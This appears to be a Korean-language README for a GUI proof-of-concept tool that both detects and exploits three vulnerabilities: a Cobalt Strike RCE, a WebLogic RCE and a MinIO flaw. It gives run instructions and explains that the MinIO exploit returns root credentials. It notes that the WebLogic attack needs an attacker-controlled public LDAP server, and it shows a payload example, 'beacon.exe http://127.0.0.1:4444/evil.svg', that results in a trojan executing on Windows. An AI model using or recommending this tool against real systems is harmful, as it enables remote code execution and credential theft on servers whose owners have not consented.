
CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432를 위한 테스트 도구입니다.
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
이 세 가지 취약점에 대한 그래픽 기반 취약점 탐지 및 이용 도구
java -jar Gui-poc-test.jar
사용 방법: 탐지 및 이용 두 개의 버튼이 있습니다. 취약점별 사용 방법은 도구 인터페이스에 힌트가 있습니다.
대상 입력, 포트 입력 불필요, 기본값 9000, 변경 가능, 소스 코드 GuiDemo.java:line144 참조
MINIO_ROOT_USER 및 MINIO_ROOT_PASSWORD 등을 반환합니다.
대상 IP, 포트, LDAP 서버 주소 입력
탐지:
참고: 취약점 이용을 위해 자체 LDAP 서버(공용 네트워크)를 구축해야 합니다.
payload 예시:
beacon.exe http://127.0.0.1:4444/evil.svg
실행 결과: Win에서 트로이 목마 실행, Mac의 CS 클라이언트 온라인
동시에 CS 측에서 jar 패키지 내용을 실행하여 계산기 팝업
Win에서 CS 접속 주소 기록
원리: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839